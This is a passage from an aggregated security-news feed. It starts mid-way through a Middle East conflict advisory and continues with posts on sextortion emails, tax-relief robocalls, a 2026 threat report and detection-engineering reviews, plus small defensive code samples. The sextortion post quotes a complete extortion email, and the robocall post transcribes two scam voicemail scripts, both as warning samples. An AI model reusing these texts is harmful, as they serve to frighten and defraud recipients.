Organizations with personnel in the Gulf region and surrounding areas should:

  • Reassess travel posture to the UAE, Qatar, Bahrain, Kuwait, and Saudi Arabia.
  • Elevate security protocols at commercial offices, hotels, and logistics facilities.
  • Reinforce operational security practices (routine variation, avoidance of identifiable clothing tied to government or defense sectors).
  • Coordinate closely with local authorities and diplomatic advisories regarding movement restrictions and emerging threat indicators.

2. Supply Chain and Energy Exposure

The reported blockade of the Strait of Hormuz, disruption to Dubai aviation, and the strike on Saudi Arabia’s Ras Tanura oil facility demonstrate that global energy and logistics systems are active pressure points. Iranian naval forces reportedly struck multiple oil tankers transiting the Strait of Hormuz on March 3, increasing the likelihood of extended maritime disruption and global energy price volatility.

IRGC statements framing a “war on energy supplies” increase the likelihood of sustained pressure on Gulf oil and gas infrastructure. Organizations must reassess exposure not only to energy price volatility, but also to infrastructure-driven availability shocks.

Organizations should:

  • Model extended disruption to Gulf maritime routes rather than short-term interruption.
  • Identify alternative shipping corridors and overland routing options.
  • Stress-test supplier dependencies tied to Gulf ports or energy inputs.
  • Prepare for price volatility and delivery delays impacting downstream operations.

3. Cloud and Technology Infrastructure

The reported physical impact to an AWS data center in the UAE reflects a significant escalation: commercial cloud infrastructure is no longer insulated from kinetic spillover. More recent reporting also indicates Iranian strikes targeting Microsoft Azure data infrastructure in the Gulf, expanding the threat profile to additional Western cloud platforms.

Iranian strikes against early-warning radars and satellite communication terminals across Gulf bases indicate a coordinated effort to degrade regional missile defense networks.

Enterprises should:

  • Confirm geographic redundancy for critical workloads.
  • Validate disaster recovery timelines (RTO/RPO) for Middle East–hosted environments.
  • Review third-party dependencies tied to regional data centers.
  • Ensure executive teams understand potential cascading impacts from localized physical disruption.
  • Organizations operating near or dependent on US or allied military infrastructure in the region should monitor potential disruptions to air defense coverage and communications networks.

4. ICS / OT Environments

Claims of intrusion into industrial control systems — including grain silo logistics and remote control infrastructure — signal elevated risk to operational technology environments. March 2 cyber reporting also emphasized blended risk: cyber operations paired with physical disruption, increasing the chance of cascading outages and degraded visibility during response.

Organizations operating ICS/SCADA systems, particularly in energy, logistics, water, and manufacturing sectors, should:

  • Audit all remote access pathways and eliminate unnecessary external exposure.
  • Enforce phishing-resistant MFA for privileged and engineering accounts.
  • Segment industrial networks from corporate IT and public internet access.
  • Validate incident response plans for destructive malware or system manipulation scenarios.
  • Conduct tabletop exercises assuming loss of visibility or control in critical systems.

What to Expect Next (48–72 Hours)

Flashpoint analysis indicates the conflict is entering a more decentralized phase characterized by hybrid warfare and expanding geographic scope.

Following the formal appointment of Mojtaba Khamenei as Supreme Leader, the Iranian state is expected to maintain a hardline military posture under strong IRGC influence. With conventional military capabilities increasingly degraded, Iranian strategy may rely more heavily on asymmetric tactics, including cyber operations, proxy mobilization, and attacks against economic and civilian infrastructure.

The fatwa issued by Grand Ayatollah Sistani introduces an additional destabilizing variable, potentially mobilizing Shiite militias across Iraq and the broader region. Combined with Kurdish mobilization along Iran’s western border and Azerbaijan’s heightened military posture in the north, the conflict may increasingly involve non-state and regional actors.

At the same time, cyber operations targeting Western defense, aviation, and infrastructure networks are likely to intensify as Iranian-linked actors attempt to expand the conflict’s impact beyond the immediate battlefield.

The activation of Iran’s decentralized “Mosaic Defense” protocol further complicates potential de-escalation. Because retaliatory authority is distributed across regional commanders, localized strike cycles may continue even if diplomatic negotiations emerge at higher political levels. This structure increases the likelihood of continued intermittent attacks across multiple theaters even as international pressure for conflict termination grows.

Ongoing Updates

Flashpoint will continue monitoring developments across physical, cyber, and geopolitical domains. Bookmark this page for updates as the situation evolves.

For organizations seeking deeper visibility into emerging threats, proxy activity, infrastructure targeting, and cross-domain escalation indicators, schedule a demo to see Flashpoint’s intelligence platform deliver timely, decision-ready intelligence.

See Flashpoint in Action

The post Escalation in the Middle East: Tracking “Operation Epic Fury” Across Military and Cyber Domains appeared first on Flashpoint.


Sextortion “I recorded you” emails reuse passwords found in disposable inboxes

Our malware removal support team recently flagged a new wave of sextortion emails, with the subject line: “You pervert, I recorded you!”

If the message sounds familiar, that’s because it’s a variation of the long-running “Hello pervert” scam.

The email claims the target’s device has been infected by a “drive-by exploit,” which supposedly gave the extortionist full access to the device. To add credibility, the scammer includes a password that actually belongs to the target.

Here’s one of the emails:

[Screenshot of the sextortion email]

Your device was compromised by my private malware. An outdated browser makes you vulnerable; simply visiting a malicious website containing my iframe can result in automatic infection.
For further information search for ‘Drive-by exploit’ on Google.
My malware has granted me full access to your accounts, complete control over your device, and the ability to monitor you via your camera.
If you believe this is a joke, no, I know your password: {an actual password}
I have collected all your private data and RECORDED FOOTAGE OF YOU MASTRUBATING THROUGH YOUR CAMERA!
To erase all traces, I have removed my malware.
If you doubt my seriousness, it takes only a few clicks to share your private video with friends, family, contacts, social networks, the darknet, or to publish your files.
You are the only one who can stop me, and I am here to help.
The only way to prevent further damage is to pay exactly $800 in Bitcoin (BTC).
This is a reasonable offer compared to the potential consequences of disclosure.
You can purchase Bitcoin (BTC) from reputable exchanges here:
{list of crypto-currency exchanges}
Once purchased, you can send the Bitcoin directly to my wallet address or use a wallet application such as Atomic Wallet or Exodus Wallet to manage your transactions.
My Bitcoin (BTC) wallet address is: {bitcoin wallet which has received 1 payment at the time of writing}
Copy and paste this address carefully, as it is case-sensitive.
You have 4 days to complete the payment.
Since I have access to this email account, I will be aware if this message has been read.
Upon receipt of the payment, I will remove all traces of my malware, and you can resume your normal life peacefully.
I keep my promises!

The message is a bit contradictory. Early on, the sender claims they have already removed the malware to “erase all traces,” but later promises to remove it after receiving payment.

Where the password comes from

I found that one particular sender using the name Jenny Green and the Gmail address JennyGreen64868@gmail.com sent many of these emails to people who use the FakeMailGenerator service.

FakeMailGenerator is a free disposable email service that gives users a temporary, receive‑only inbox they can use instead of their real address, mainly to get around email confirmations or avoid spam.

As mentioned, the addresses are receive‑only, meaning they cannot legitimately send mail and the mailbox is not tied to a specific person. On top of that, there is no login. Anyone who knows the address (or guesses the inbox URL) can see the same inbox.

My guess is that the scammer searched these public inboxes for passwords and then reused those passwords in their sextortion emails.

So users of FakeMailGenerator and similar services should consider this a warning. Your inbox may be publicly accessible and show up in search results, and you may receive a lot more than you signed up for. Definitely don’t use services like this for anything sensitive.

How to stay safe

Knowing these scams exist is the first step to avoiding them. Sextortion emails rely on panic and embarrassment to push people into paying quickly. Here are a few simple steps to protect yourself:

  • Don’t rush. Scammers rely on fear and urgency. Take a moment to think before reacting.
  • Don’t reply to the email. Responding tells the attacker that someone is reading messages at that address, which may lead to more scams.
  • Change your password if it appears in the email. If you still use that password anywhere, update it.
  • Use a password manager. If you’re having trouble generating or storing a strong password, have a look at a password manager.
  • Don’t open unsolicited attachments. Especially when the sender address is suspicious or even your own.
  • Don’t use disposable inboxes for important accounts. The mail in that inbox might be available for anyone to find.
  • For peace of mind, turn your webcam off or buy a webcam cover so you can cover it when you’re not using the webcam.
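One of the steps above — checking whether a password that shows up in such an email is known to be breached — can be done programmatically against the public Have I Been Pwned “Pwned Passwords” range API. The sketch below is illustrative (the function names are my own); it relies only on the Python standard library and uses the API’s k-anonymity model, so the full password or hash never leaves your machine.

```python
import hashlib
import urllib.request

# Public Have I Been Pwned "Pwned Passwords" range endpoint (no API key needed).
HIBP_RANGE_URL = "https://api.pwnedpasswords.com/range/"

def sha1_prefix_suffix(password: str) -> tuple:
    """Split the uppercase SHA-1 hex digest into the 5-character prefix
    that is sent to the API and the 35-character suffix kept locally."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]

def pwned_count(password: str, timeout: float = 10.0) -> int:
    """Return how many times the password appears in known breach corpora.

    Only the first 5 hex characters of the hash ever leave your machine;
    the response lists every suffix sharing that prefix with its count.
    """
    prefix, suffix = sha1_prefix_suffix(password)
    with urllib.request.urlopen(HIBP_RANGE_URL + prefix, timeout=timeout) as resp:
        body = resp.read().decode("utf-8")
    for line in body.splitlines():
        candidate, _, count = line.partition(":")
        if candidate.strip() == suffix:
            return int(count)
    return 0  # not found in any known breach

# Example (performs a network request):
#   pwned_count("password")  # a non-zero count means: retire this password
```

A non-zero count doesn’t mean your account was breached, only that the password itself is circulating — which, as this scam shows, is enough for an extortionist to make their email look credible.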

Pro tip: Malwarebytes Scam Guard immediately recognized this for what it is: a sextortion scam.


What do cybercriminals know about you?

Use Malwarebytes’ free Digital Footprint scan to see whether your personal information has been exposed online.


Understanding GRC: How to Navigate Risks and Compliance Standards

“GRC” isn’t all witchcraft and administrative nonsense — it’s the core that drives security initiatives, connects security spend to business outcomes, and powers a well-functioning security team.

The post Understanding GRC: How to Navigate Risks and Compliance Standards appeared first on Black Hills Information Security, Inc..


Watch out for tax-season robocalls pushing fake “relief programs”

While Americans are sorting through paperwork to get their taxes filed in time, scammers are working overtime to grab a piece of the action.

As tax season ramps up, so does scam activity. Our telemetry shows a spike in robocalls impersonating tax resolution firms, tax relief agencies, and vaguely named “assistance centers.” These calls are designed to create urgency, fear, and confusion in the hope of pushing recipients to call back before they have time to think critically.

These robocalls typically try to collect personal information, pressure victims into paying fake tax debts, or funnel them into questionable tax-relief services.

Below are transcripts of two recent voicemail examples submitted by anonymized Scam Guard users that illustrate how these scams operate.

The scripts: different names, similar playbook

Voicemail #1

“Hi, this is <REDACTED_NAME> calling on March 3rd from the eligibility support and review division at the tax resolution assistance center.  I’m contacting you because your account remains under active confirmation review.  There is still an opportunity to verify your standing while this evaluation period remains open.  To make this simple, we provide a direct proprietary verification line with no weight, allowing immediate access to clear and accurate information.  This verification step is brief and focused strictly on determining current eligibility and available options.  Please call back at 888-919-9743.  Again, 888-919-9743.  If this message reached you in error, please call back and press 3 to be removed”

Characteristics:

  • Claims to be from an “eligibility support and review division at the tax resolution assistance center.”
  • Says your “account remains under active confirmation review.”
  • Offers a “direct proprietary verification line.”
  • Urges quick action while the “evaluation period remains open.”
  • Provides a callback number and an opt-out option.

Voicemail #2

“Hi, this is <REDACTED_NAME> with professional tax associates. Today is Tuesday March 3rd. I’m calling to follow up on back taxes and missed filings. This may be our only attempt to reach you, and due to new resolution programs that are available for a limited time, we highly recommend you give us a call today. This will be your best opportunity to get a fresh start before it becomes a bigger and permanent issue. Please call us back today at 8338204216 again 8338204216. If you’ve already resolved this issue. You may disregard this message or call back using the number on your caller ID to opt out. Thank you. If you were reached in error or wish to stop future outreach, please press 8 now and you will be removed from future outreach. Thank you and we look forward to assisting you. “

Characteristics:

  • Claims to be with “professional tax associates.”
  • References “back taxes and missed filings.”
  • Warns this “may be our only attempt to reach you.”
  • Mentions “new resolution programs available for a limited time.”
  • Provides a callback number and opt-out instructions.

What these robocalls have in common

While the wording differs slightly, the structure and psychological tactics are nearly identical.

Both messages use generic but authoritative language:

  • “Eligibility support and review division”
  • “Tax resolution assistance center”
  • “Professional tax associates”

These names sound legitimate but don’t identify a specific, verifiable company. Scammers often rely on institutional-sounding phrases to create credibility without providing any real details.

Both messages also reference vague “account” problems, but neither voicemail mentions:

  • Your name
  • A specific tax year
  • A case number
  • A known agency like the IRS

Instead, they reference:

  • “Active confirmation review”
  • “Back taxes and missed filings”
  • “Eligibility and available options”

This vagueness is intentional. It allows the same robocall script to target thousands of people, regardless of their actual tax situation.

What you will always see with scams is urgency. Both calls attempt to rush the recipient into action:

  • “There is still an opportunity… while this evaluation period remains open.”
  • “This may be our only attempt to reach you.”
  • “Limited time resolution programs.”
  • “Call today.”

Creating urgency reduces the likelihood that someone will pause, research the number, or consult a trusted source.

The second voicemail includes the promise of a “fresh start before it becomes a bigger and permanent issue.” This is a common emotional hook, blending fear (a permanent problem) with hope (a fresh start), which can encourage impulsive callbacks.

Both messages push recipients to call a direct number rather than referencing an official website or established contact method. Legitimate tax agencies, including the IRS, do not initiate contact through unsolicited robocalls asking you to call back immediately.

Both scripts include instructions like:

  • “Press 3 to be removed.”
  • “Press 8 now and you will be removed.”
  • “Call back using the number on your caller ID to opt out.”

These opt-out options create an illusion of compliance and legitimacy. In reality, pressing numbers or calling back can confirm that your phone number is active, which may lead to more scam calls.

How to stay safe

Knowing how to identify scam calls is an important step. So, here are some key red flags to watch for:

  • No personalization
  • Vague agency names
  • Pressure to act immediately
  • Threat of missed opportunity
  • Promises of relief without verification
  • Instructions to call back a random 800/833/888 number
  • Robotic or heavily scripted tone

If a message checks at least one of these boxes, it is very likely not legitimate.
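The red flags above lend themselves to rough automated triage. The sketch below is a hypothetical keyword checker — the patterns and flag names are my own illustration, not how any real product (such as Scam Guard) works — but it shows how a voicemail transcript can be scored against the list:

```python
import re

# Hypothetical patterns loosely mirroring the red flags listed above.
RED_FLAGS = {
    "vague_agency": re.compile(
        r"\b(assistance center|resolution (center|division|program)|"
        r"review division|associates)\b", re.IGNORECASE),
    "urgency": re.compile(
        r"\b(act (now|today)|limited time|only attempt|"
        r"call (us )?back today|immediately|final notice)\b", re.IGNORECASE),
    "relief_promise": re.compile(
        r"\b(fresh start|relief program|forgiveness|settle for less)\b",
        re.IGNORECASE),
    # Toll-free callback numbers like 833-820-4216.
    "callback_number": re.compile(
        r"\b8(00|33|44|55|66|77|88)[\s.-]?\d{3}[\s.-]?\d{4}\b"),
    # "Press 8 now and you will be removed" style fake opt-outs.
    "fake_opt_out": re.compile(
        r"\bpress \d+\b.*?\b(removed|opt out)\b", re.IGNORECASE | re.DOTALL),
}

def scam_flags(transcript: str) -> list:
    """Return the names of the red flags that match the transcript."""
    return [name for name, pattern in RED_FLAGS.items()
            if pattern.search(transcript)]
```

Running `scam_flags` over the second voicemail, for example, would trip the vague-agency, urgency, callback-number, and fake-opt-out patterns — a keyword match is never proof, but several hits together are a strong signal to hang up and verify independently.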

  • Before calling a number, verify it by visiting the official site directly.
  • Beware of unsolicited phone calls or emails, especially those that ask you to act immediately. Government agencies will not call out of the blue to demand sensitive personal or financial information.
  • Never provide sensitive personal information such as your bank account, charge card, or Social Security number over unverified channels. Instead use a secure method such as your online account or another application on IRS.gov.
  • Report scams to the IRS to help others.

We don’t just report on threats—we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your personal information, and your family’s, by using identity protection.


Navigating 2026’s Converged Threats: Insights from Flashpoint’s Global Threat Intelligence Report


In this post, we preview the critical findings of the 2026 Global Threat Intelligence Report, highlighting how the collapse of traditional security silos and the rise of autonomous, machine-speed attacks are forcing a total reimagining of modern defense.

March 11, 2026

The cybersecurity landscape has reached a point of total convergence, where the silos that once separated malware, identity, and infrastructure have collapsed into a single, high-velocity threat engine. Simultaneously, the threat landscape is shifting from human-led attacks to machine-speed operations as a result of agentic AI, which acts as a force multiplier for the modern adversary.

Flashpoint’s 2026 Global Threat Intelligence Report

Flashpoint’s 2026 Global Threat Intelligence Report (GTIR) was developed to equip security leaders — from threat intelligence and vulnerability management teams to physical security professionals and the CISO’s office — with the data required to navigate this year’s greatest threats: infostealers, vulnerabilities, ransomware, and malicious insiders.

Our report uncovers several staggering metrics that illustrate the industrialization of modern cybercrime:

  • AI-related illicit activity skyrocketed by 1,500% in a single month at the end of 2025.
  • 3.3 billion compromised credentials and cloud tokens have turned identity into the primary exploit vector.
  • Ransomware incidents rose by 53% over the course of 2025, as attackers pivoted from technical encryption to “pure-play” identity extortion.
  • Vulnerability disclosures surged by 12% over the same period, with the window between discovery and mass exploitation effectively vanishing.

These findings are derived from Flashpoint’s Primary Source Collection (PSC), a specialized operating model that collects intelligence directly from original sources, driven by an organization’s unique Priority Intelligence Requirements (PIR). The 2026 Global Threat Intelligence Report leverages this ground-truth data to provide a strategic framework for the year ahead. Download to gain:

  1. A Clear Understanding of the New Convergence Between Identity and AI
    Discover how threat actors are preparing to transition from generative tools to sophisticated agentic frameworks. Learn how 3.3 billion compromised credentials are being weaponized via automated orchestration to bypass legacy defenses and exploit the connective tissue of modern corporate APIs.
  2. Intelligence on the “Franchise Model” of Global Extortion
    Gain deep insight into the professionalized operations of today’s most prolific threat actors. From the industrial efficiency of RaaS groups like RansomHub and Clop to the market dominance of the next generation of infostealer malware, we break down the economics driving today’s cybercrime ecosystem.
  3. A Blueprint for Proactive Defense and Risk Mitigation
    Leverage the latest trends, in-depth analysis, and data-driven insights driven by Primary Source Collection to bolster your security posture by identifying and proactively defending against rising attack vectors.

“As attackers automate exploitation of identity, vulnerabilities, and ransomware, defenders who rely on fragmented visibility will fall behind. To keep pace, organizations must ground their decisions in primary-source intelligence that is drawn from adversarial environments, so that decision-makers can get ahead of this accelerating threat cycle.”

Josh Lefkowitz, CEO & Co-Founder at Flashpoint

The Top Threats at a Glance

Our latest report identifies four driving themes shaping the 2026 threat landscape:

2026 Is the Era of Agentic-Based Cyberattacks

Flashpoint identified a 1,500% rise in AI-related illicit discussions between November and December 2025, signaling a rapid transition from criminal curiosity to the active development of malicious frameworks. Built on data pulled from criminal environments and shaped by fraud use cases, these systems scrape data, adjust messaging for specific targets, rotate infrastructure, and learn from failed attempts without the need for constant human involvement.

2026 is the era of agentic-based cyberattacks. We’ve seen a 1,500% increase in AI-related illicit discussions in a single month, signaling increased interest in developing malicious frameworks. The discussions evolve into vibe-coded, AI-supported phishing lures, malware, and cybercrime venues. When iteration becomes cheap through automation, attackers can afford to fail repeatedly until they find a successful foothold.

Ian Gray, Vice President of Cyber Threat Intelligence Operations at Flashpoint

Identity Is the New Exploit

Flashpoint observed over 11.1 million machines infected with infostealers in 2025, fueling a massive inventory of 3.3 billion stolen credentials and cloud tokens. The fundamental mechanics of cybercrime have shifted from breaking in to logging in, as attackers leverage stolen session cookies to behave like legitimate users.

The Patching Window Is Rapidly Closing

Vulnerability disclosures surged by 12% in 2025, with 1 in 3 (33%) vulnerabilities having publicly available exploit code. The strategic gap between discovery and weaponization is rapidly vanishing, as evidenced by mass exploitation of zero-day vulnerabilities within as little as 24 hours of discovery.

Ransomware Is Hacking the Person, Not the Code

As technical defenses against encryption harden, ransomware groups are pivoting to the path of least resistance: human trust. This approach has led to a 53% increase in ransomware attacks, with RaaS groups responsible for over 87% of them.

Build Resilience in a Converged Landscape

The findings in the 2026 Global Threat Intelligence Report make one thing clear: incremental improvements to legacy security models are no longer sufficient. As adversaries transition to machine-speed operations, the strategic advantage shifts to organizations that can maintain visibility into the adversarial environments where these attacks are born.

Protecting organizations and communities requires an intelligence-first approach. Download Flashpoint’s 2026 Global Threat Intelligence Report to gain clarity and the data-driven insights needed to safeguard critical assets.

Get Your Copy

The post Navigating 2026’s Converged Threats: Insights from Flashpoint’s Global Threat Intelligence Report appeared first on Flashpoint.


DEW #148 - Detection Pipeline Maturity, GenUI for Log Analysis and Hunting Kali in Splunk

Welcome to Issue #148 of Detection Engineering Weekly!

✍️ Musings from the life of Zack:

  • I have some exciting news! In about a week, you’ll see some new branding for Detection Engineering Weekly. This will be the second brand uplift of the newsletter, and I can’t wait to don the new colors and logo. It’s more professional and understated, and it captures much of the energy of what I think this newsletter brings to your inboxes. I’ll be handing out stickers and potentially some t-shirts at BSidesSF in a few weeks!

  • Speaking of BSidesSF, I’m interested in how many of you are going to be there. I am organizing a happy hour and doing a sticker order, so please vote Yes here, ping me, or honestly just find me in the hallway (I’ll be shilling the newsletter with t-shirts) and say hello!

Sponsor: Spectrum Security

Detection is Broken.

Measuring coverage means wrangling spreadsheets, BAS tools, and weeks of manual work. By the time you finish, the data is out of date.

But finding blind spots is only half the battle. There’s never enough time to close them. You’re on an endless treadmill: writing new rules, fixing broken ones, and tuning out noise.

We built the end of the manual grind.

Get an early look at the AI platform transforming how teams identify, build, & deploy detections

Try It Now


Every week, I read, watch and listen to all the Detection Engineering content so you can consume it all in 10 minutes. Subscribe and get a weekly digest of the latest and greatest in threat detection engineering!

💎 Detection Engineering Gem 💎

Detection Pipeline Maturity Model by Scott Plastine

I’m a huge fan of maturity models, and in the early days of my writing, I frequently referenced the work of Haider Dost and Kyle Bailey when discussing the maturity of detection engineering programs. As this space matured, technology matured with it, and we now have complex systems within each part of the Detection Engineering Lifecycle. So, to me, it makes sense that we now have folks like Plastine helping us understand what it means to measure the maturity of a Detection Pipeline.

Plastine outlines six different levels of maturity, starting with a classic favorite: no maturity! This involves a security tool stack with no centralization, where analysts have dozens to hundreds of Google Chrome tabs open, which gives me anxiety. The fundamental issues Plastine outlines, and progressively improves on, include:

  • Several security tools with their own alerting and detection systems

  • The need to log into each individual tool to investigate each alert, leading to screen sprawl

  • The analyst manually building cases in some case management or ticketing tool, such as JIRA or ServiceNow

The next maturity step, Basic, addresses some of these issues by essentially placing the Case Management tool between the tools and the analyst, rather than being out of band. As maturity levels progress, so does the architecture of this setup. For example, the “Standard+” architecture has a much saner pipeline setup:

The cool part at this point in the maturity journey is switching from architecture improvements to more advanced concepts in the analytics platform. Custom telemetry, log normalization, and a risk-based alerting engine ideally surface only relevant alerts and reduce false positives. Teams begin to build composite rules, leveraging commercial detections alongside their own internal detection and risk alerting systems, and they all take advantage of learning from their data to inform their rule sets, not just their environment.

This diagram drove it home for me, and became my favorite:

As teams progress through the maturity levels, the trap they fall into is believing that more rules is better. I think the measure of a Leading detection function is reducing rule count, thereby reducing the complexity of managing rule sprawl.

Plastine posits that this can be achieved by using data-science-based rules, risk-based detection, and leveraging as much entity-based correlation as possible.
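A minimal sketch of the risk-based alerting idea in Python (the rule names and weights here are hypothetical, not from Plastine's model): each rule hit adds a weighted score to an entity, and only entities crossing a threshold surface an alert, rather than every hit paging an analyst.

```python
from collections import defaultdict

# Hypothetical rule hits: (entity, rule_name, risk_weight)
hits = [
    ("host-42", "rare_parent_process", 20),
    ("host-42", "new_admin_login", 30),
    ("host-42", "outbound_to_rare_asn", 40),
    ("host-07", "rare_parent_process", 20),
]

RISK_THRESHOLD = 80

def entities_over_threshold(hits, threshold=RISK_THRESHOLD):
    """Aggregate per-entity risk and return only entities worth an alert."""
    scores = defaultdict(int)
    for entity, _rule, weight in hits:
        scores[entity] += weight
    return {e: s for e, s in scores.items() if s >= threshold}

print(entities_over_threshold(hits))  # {'host-42': 90}
```

The entity-based correlation Plastine describes is essentially this aggregation step done across many telemetry sources instead of one list.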


🔬 State of the Art

Whose endpoint is this… kali?! by Alex Teixeira

I love reading Alex’s detection and hunting blogs because he always stuffs a ton of knowledge around query optimization and hunting. When you manage massive amounts of data in a SIEM, especially Splunk, you need to query it in a way that doesn’t cause a ton of load on the system. This is especially helpful when you are researching new detection rules.

In this post, Alex addresses query optimization and discovery for post-exploitation tools. I typically see a lot of teams worry, for good reason, about malware used in the beginning stages of a breach. Alex references loaders in this scenario: malware designed as an initial beachhead for infection, which is then upgraded into a more reliable malware tool. Cobalt Strike is a leading example, but there are hundreds at this point.

Post-exploitation tools are aptly named to help threat actors navigate the MITRE ATT&CK chain toward a specific objective, such as data exfiltration or ransomware. Persistence, lateral movement, and privilege escalation are all built into these types of tools. So if you assume these exist, how do you catch them?

From Alex’s Prioritizing a Detection Backlog post https://detect.fyi/how-to-prioritize-a-detection-backlog-84a16d4cc7ae

His strategy is to “reduce the dataset” as you are hunting. Instead of performing blind searches over logs, you can first focus on terms within the index and the Windows sourcetype itself. So, he begins his hunt looking for the term kali in Windows Event Logs. This is because these tools can leak their internal hostnames, and finding kali in the hostname with some threat activity is a great hunting lead.

Through a combination of hostname detection and observing a network event with the same name, he narrows the dataset to a meaningful set of events to respond to an infection and write rules for afterward.
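As a toy illustration of the "reduce the dataset" strategy (in Python rather than SPL, with invented field names and values): first narrow to events whose workstation name contains the leaked term, then keep only names that also appear in network telemetry.

```python
# Toy stand-in for the Splunk hunt described above (field names are made up):
# narrow the dataset to events mentioning the term, then correlate with
# network events carrying the same hostname.
windows_events = [
    {"host": "WS-FINANCE-01", "workstation_name": "kali", "event_id": 4624},
    {"host": "WS-HR-03", "workstation_name": "DESKTOP-9QX", "event_id": 4624},
]
network_events = [
    {"src_host": "kali", "dest_port": 445},
]

def leaked_attacker_hostnames(win_events, net_events, term="kali"):
    """Hostnames that both match the hunt term and show up on the network."""
    suspects = {e["workstation_name"] for e in win_events
                if term in e["workstation_name"].lower()}
    seen_on_network = {e["src_host"] for e in net_events}
    return suspects & seen_on_network

print(leaked_attacker_hostnames(windows_events, network_events))  # {'kali'}
```

The point of the two-step shape is cheap filtering first: the expensive correlation only runs over the handful of events that survived the term search.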


Tracking DPRK operator IPs over time by Kieran Miyamoto

Threat research is such a fun, dynamic field within security because it examines both the technical and human elements of threat actors. This post is Miyamoto's “Part 3” on tracking DPRK threat actors via OPSEC failures, and it’s brilliant in its simplicity. Basically, FAMOUS CHOLLIMA, which has Contagious Interview and some WageMole overlaps, uses email to maintain its personas, register accounts, and issue fake employment-scam communications. The technical elements of this are interesting because they try to deploy malware on victim machines or obtain legitimate jobs as fake IT workers.

The human element of this operation is that humans tend to optimize for reducing the time it takes to do their job as efficiently as possible. So, why would you go through a ton of work to get legitimate email inboxes like Gmail or Yahoo if you only need the email address to send scam messages or register an npm account to publish malware? Miyamoto found that this group had the same question, and answered it by using temporary email addresses.

The subsequent finding is that, as long as you know the email address, you can also view the inbox! Miyamoto started with malicious npm packages containing maintainer emails and began logging into DPRK-controlled temporary email accounts to glean additional intelligence, including source IP addresses and potential victim targets.


From GenAI to GenUI: Why Your AI CTI Agent Is Sh*T by Thomas Roccia

TIL there’s a concept called Generative UI, where agents decide how to render the UI in real time based on your queries. In this post, Roccia uses this concept to build out use cases for cyber threat intelligence analysis. The idea here is that visually representing threat intelligence can help a researcher understand the underlying data much better than blobs of text. Roccia argues that most CTI Agents focus on ingesting unstructured threat intelligence and producing large volumes of output tailored to your environment or prompt. This setup can be helpful to some, but adding a visual component to aid your understanding makes it more attractive.

Roccia outlines two GenUI styles: MCPUI and A2UI. Both focus on delivering a graphical representation of a prompt response. MCPUI returns dynamic elements from an MCP server in response to a prompt, but it’s mostly contained within a UI that the developer creates. A2UI takes it a step further by delivering the entire UI experience in a container, making the agent the arbiter of the experience.

Roccia’s A2UI implementation was more interesting to me from a detection standpoint because he built a log analyzer on top of a log stream. Each element is supposedly dynamic, and you can click into and investigate logs while allowing the A2UI protocol to do its thing and present data and experiences to you, all driven by an agent. Here’s a demo video from his blog:

Wild times!


How we built high speed threat hunting for email security by Hugh Oh

I love it when security product companies show how they’ve engineered their product. In this post, Oh reveals how Sublime Security designed its massive email-detection and threat-hunting architecture. Their platform is built on MQL, their domain-specific language for rule writing and alerting. When you think about email as a telemetry source, there are some inherent issues you have to worry about, unlike other sources:

  • Unstructured body content, since, by design, it is human-generated and human-readable

  • In Internet standards, email is a pretty ancient concept, so additional designs and RFCs were layered on top of it for decades, which can introduce some sharp edges

  • Attachments, integrations and user-experience elements are a huge vector for abuse, so you need to be able to parse those

Parsing all of this at scale is both a security and an engineering problem.

https://sublime.security/blog/how-we-built-high-speed-threat-hunting-for-email-security/

The Sublime product parses incoming emails into EML format and stores metadata in fast storage and the full contents in blob storage. They split email selection into several phases. Candidate selection focuses on fast metadata lookups; evaluation performs a deeper analysis to determine whether these candidates are truly worth a blob storage query; and, when the full email is retrieved, they can perform enrichments and ultimately decide whether to generate a result.
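The phased design can be sketched roughly like this (all names, fields, and stores below are hypothetical, not Sublime's actual implementation): a cheap pass over indexed metadata picks candidates, and only candidates trigger the expensive fetch from blob storage for full evaluation.

```python
# Sketch of two-phase selection (hypothetical data, not Sublime's schema):
# phase 1 runs fast metadata lookups; phase 2 fetches full content from
# blob storage only for the surviving candidates.
metadata_store = [
    {"id": 1, "sender_domain": "example-payroll.biz", "has_attachment": True},
    {"id": 2, "sender_domain": "corp.example.com", "has_attachment": False},
]
blob_store = {1: "full EML body with suspicious link", 2: "routine newsletter"}

def candidate_selection(meta):
    # Phase 1: cheap filters on indexed metadata only.
    return [m for m in meta if m["has_attachment"] or
            not m["sender_domain"].endswith("corp.example.com")]

def evaluate(candidates):
    # Phase 2: the expensive blob read happens only here.
    results = []
    for m in candidates:
        body = blob_store[m["id"]]
        if "suspicious" in body:
            results.append(m["id"])
    return results

print(evaluate(candidate_selection(metadata_store)))  # [1]
```

The design win is the same one Sublime describes: most emails never cost you a blob storage query at all.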


A Practical Blue Team Project: SSH Log Analysis with Python by Edson Encinas

This is a great introductory post on researching a singular log source, SSH authentication logs, and building a research plan to implement detection rules. I think sometimes people breaking into this industry want to jump right into a SIEM and write rules, which can take time, energy, and potentially cost a lot to set up, whereas in this post, Encinas leveraged Python. It’s a good learning exercise: you can see where Python excels at detection, especially in a risk-based alerting scenario.

The architecture for the SSH alerting pipeline includes parsing, normalization, rule writing, risk calculation, and de-duplication. Their GitHub project was pretty easy to follow alongside the blog. Again, demonstrating these concepts in pure Python can accelerate understanding more than setting up massive environments.
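As a hedged sketch of that pipeline (the regex and risk weights below are mine, not taken from Encinas' project), here is the parse, normalize, rule, and risk-calculation loop compressed into a few lines:

```python
import re

# Illustrative SSH auth-log pipeline: parse sshd lines, normalize matches
# into dicts, apply one rule (failed password), accumulate risk per source IP.
FAILED = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")

lines = [
    "Jan 10 04:12:01 srv sshd[911]: Failed password for invalid user admin from 203.0.113.7 port 51812 ssh2",
    "Jan 10 04:12:03 srv sshd[911]: Failed password for root from 203.0.113.7 port 51814 ssh2",
    "Jan 10 04:13:10 srv sshd[911]: Accepted password for alice from 198.51.100.9 port 40000 ssh2",
]

def risk_by_ip(log_lines, weight=25):
    """Each failed password adds `weight` risk to the source IP."""
    scores = {}
    for line in log_lines:
        m = FAILED.search(line)
        if m:
            event = m.groupdict()  # normalized event: {"user": ..., "ip": ...}
            scores[event["ip"]] = scores.get(event["ip"], 0) + weight
    return scores

print(risk_by_ip(lines))  # {'203.0.113.7': 50}
```

De-duplication and alert thresholds bolt on naturally after this step, which is exactly why a pure-Python version is such a good teaching vehicle.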


☣️ Threat Landscape

